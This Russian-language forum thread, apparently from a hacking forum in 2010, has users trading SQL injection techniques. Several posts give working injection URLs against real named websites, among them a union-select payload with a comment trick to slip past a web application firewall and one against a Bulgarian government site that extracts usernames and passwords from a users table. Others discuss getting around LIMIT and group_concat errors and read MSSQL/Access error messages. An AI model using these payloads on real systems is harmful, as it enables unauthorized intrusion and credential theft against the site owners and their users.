17.02.2010, 19:19
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от CyberHunter
У меня ничего подобного, вот смотри, что у меня:
э, мен, ссылку когда отсюда копируешь, пробелы убирай, тут они специально расставляются, от таких как ты 
Сам подумай, откуда в url могут быть ПРОБЕЛЫ
|
|
|
17.02.2010, 19:21
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
э, мен, ссылку когда отсюда копируешь, пробелы убирай, тут они специально расставляются, от таких как ты
Сам подумай, откуда в url могут быть ПРОБЕЛЫ
 Об этом и хотел спросить
|
|
|
|
17.02.2010, 20:59
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
a vot zdes ??
http://www.aspik.am/index.php?p=-5+union+select+1
|
|
|
|
17.02.2010, 22:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
Сообщение от LokbatanLi
a vot zdes ??
http://www.aspik.am/index.php?p=-5+union+select+1
WAF не дремлет...
Код:
http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat_ws(0x3a,version(),database(),user())
|
|
|
|
18.02.2010, 07:14
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
Сообщение от RulleR
WAF не дремлет...
Код:
http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat_ws(0x3a,version(),database(),user())
izvini a dalse kak budet ??
http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat(table_name)*/+from*/+information_schema.tables*/
ili kak ??
a mojet podrobnee voobse eto kakoy metod ??
|
|
|
|
17.02.2010, 22:30
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
есть способы обхода этой ошибки иле можно заменить limit както?
Последний раз редактировалось [Feldmarschall]; 17.02.2010 в 22:34..
|
|
|
|
17.02.2010, 23:18
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от [Feldmarschall]
что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
есть способы обхода этой ошибки иле можно заменить limit както?
LIMIT можно:
Код:
WHERE field_name NOT IN (a, b, c ,d)
group_concat - хз...
|
|
|
|
17.02.2010, 23:31
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
Пацаны, хелп, плиз )))
Код HTML:
http://www.site.com/script.asp?id=1'+or+1=@@version--
Выдает:
Код HTML:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=1' or 1=@@version--'.
/script.asp, line 17
Что за нах**? |
|
|
|
18.02.2010, 01:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
Сообщение от [Feldmarschall]
что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
есть способы обхода этой ошибки иле можно заменить limit както?
мб потому что это mssql?)
Сообщение от ~EviL~
P.S. Я статьи все уже давно наизусть знаю, просто давно не было MSSQL-INJ поэтому решил спросить.
мб потому что это access?)
www.mlsp.government.bg/EIF/forum/reply.asp?id=-4+union+select+1,1,1,1,1,1,1,1,1,username%2b'<=>'% 2bpassword,1,1,1,1,1+from+users
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
17.02.2010, 23:33
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Access не держит комментарии.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1911826){kind=avatar}
Похожие темы
Комбинированный вид
